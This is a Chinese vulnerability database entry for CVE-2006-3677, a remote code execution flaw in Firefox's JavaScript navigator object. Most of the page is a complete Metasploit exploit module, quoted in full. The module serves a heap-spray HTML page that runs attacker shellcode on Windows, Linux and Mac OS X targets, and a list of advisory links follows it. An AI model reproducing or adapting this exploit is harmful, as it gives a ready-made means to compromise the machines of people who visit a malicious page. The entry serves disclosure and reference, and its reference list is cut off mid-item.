Mozilla Firefox Javascript导航器对象远程代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110684 漏洞类型 配置错误
发布时间 2006-07-25 更新时间 2007-09-05
CVE编号 CVE-2006-3677 CNNVD-ID CNNVD-200607-482
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/9946
https://www.securityfocus.com/bid/19192
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-482
|漏洞详情
MozillaFirefox是一款开放源码的WEB浏览器。如果在web页面中使用的话,Java就会在启动时引用window.navigator对象的属性。如果在启动Java之前页面取代了导航器对象的话,Firefox浏览器就会崩溃,导致执行攻击者所提供的代码。
|漏洞EXP
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core/constants'
require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name    => HttpClients::FF,
		:javascript => true,
		:rank       => NormalRanking, # reliable memory corruption
		:vuln_test  => %Q|
			is_vuln = false;
			if (window.navigator.javaEnabled && window.navigator.javaEnabled()){
				is_vuln = true; 
			}
			|,
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mozilla Suite/Firefox Navigator Object Code Execution',
			'Description'    => %q{
				This module exploits a code execution vulnerability in the Mozilla
			Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit 
			requires the Java plugin to be installed.

			},
			'License'        => MSF_LICENSE,
			'Author'         =>  ['hdm'],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE',    '2006-3677'],
					['OSVDB',  '27559'],
	  				['BID',    '19192'],
					['URL',    'http://www.mozilla.org/security/announce/mfsa2006-45.html'],
					['URL',    'http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html'],
				],
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "",
				},
			'Targets'        =>
				[
					[ 'Firefox 1.5.0.4 Windows x86', 
						{
							'Platform' => 'win',
							'Arch' => ARCH_X86,
							'Ret'  => 0x08000800,
							'Fill' => "%u0800",
						}
					],
					[ 'Firefox 1.5.0.4 Linux x86', 
						{
							'Platform' => 'linux',
							'Arch' => ARCH_X86,
							'Ret'  => -0x58000000,
							'Fill' => "%ua8a8",
						}
					],
					[ 'Firefox 1.5.0.4 Mac OS X PPC', 
						{
							'Platform' => 'osx',
							'Arch' => ARCH_PPC,
							'Ret'  => 0x0c000000,
							'Fill' => "%u0c0c",
						}
					],
					[ 'Firefox 1.5.0.4 Mac OS X x86', 
						{
							'Platform' => 'osx',
							'Arch' => ARCH_X86,
							'Ret'  => 0x1c000000,
							'Fill' => "%u1c1c",
						}
					],																
				],
			'DisclosureDate' => 'Jul 25 2006'
			))
	end

	def on_request_uri(cli, request)
	
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
		send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
		
		# Handle the payload
		handler(cli)
	end
	
	def generate_html(payload)

		enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		return %Q|
<html><head>
<script>
	function Exploit() {
		if (window.navigator.javaEnabled) {
			var shellcode = unescape("#{enc_code}");
			var b = unescape("#{target['Fill']}");
			while (b.length <= 0x400000) b+=b;

			var c = new Array();
			for (var i =0; i<36; i++) {
				c[i] = 
					b.substring(0,  0x100000 - shellcode.length) + shellcode +
					b.substring(0,  0x100000 - shellcode.length) + shellcode + 
					b.substring(0,  0x100000 - shellcode.length) + shellcode + 
					b.substring(0,  0x100000 - shellcode.length) + shellcode;
			}

			window.navigator = (#{target['Ret']} / 2);
			try {
				java.lang.reflect.Runtime.newInstance(
					java.lang.Class.forName("java.lang.Runtime"), 0
				);
			}catch(e){

			}
		}
	}
</script>
</head><body onload='Exploit()'>Please wait...</body></html>
		|
	end
end
|受影响的产品
Ubuntu Ubuntu Linux 5.10 sparc Ubuntu Ubuntu Linux 5.10 powerpc Ubuntu Ubuntu Linux 5.10 i386 Ubuntu Ubuntu Linux 5.10 amd64 Ubuntu Ubuntu Linux 6.06 LTS sparc Ubuntu Ubun
|参考资料

来源:US-CERT
名称:TA06-208A
链接:http://www.us-cert.gov/cas/techalerts/TA06-208A.html
来源:US-CERT
名称:VU#670060
链接:http://www.kb.cert.org/vuls/id/670060
来源:BID
名称:19192
链接:http://www.securityfocus.com/bid/19192
来源:VUPEN
名称:ADV-2006-2998
链接:http://www.frsirt.com/english/advisories/2006/2998
来源:SECUNIA
名称:21229
链接:http://secunia.com/advisories/21229
来源:SECUNIA
名称:21216
链接:http://secunia.com/advisories/21216
来源:SECUNIA
名称:19873
链接:http://secunia.com/advisories/19873
来源:issues.rpath.com
链接:https://issues.rpath.com/browse/RPL-536
来源:XF
名称:mozilla-javascript-navigator-code-excecution(27981)
链接:http://xforce.iss.net/xforce/xfdb/27981
来源:MISC
链接:http://www.zerodayinitiative.com/advisories/ZDI-06-025.html
来源:UBUNTU
名称:USN-327-1
链接:http://www.ubuntulinux.org/support/documentation/usn/usn-327-1
来源:BID
名称:19181
链接:http://www.securityfocus.com/bid/19181
来源:BUGTRAQ
名称:20060727rPSA-2006-0137-1firefox
链接:http://www.securityfocus.com/archive/1/archive/1/441333/100/0/threaded
来源:BUGTRAQ
名称:20060726ZDI-06-025:M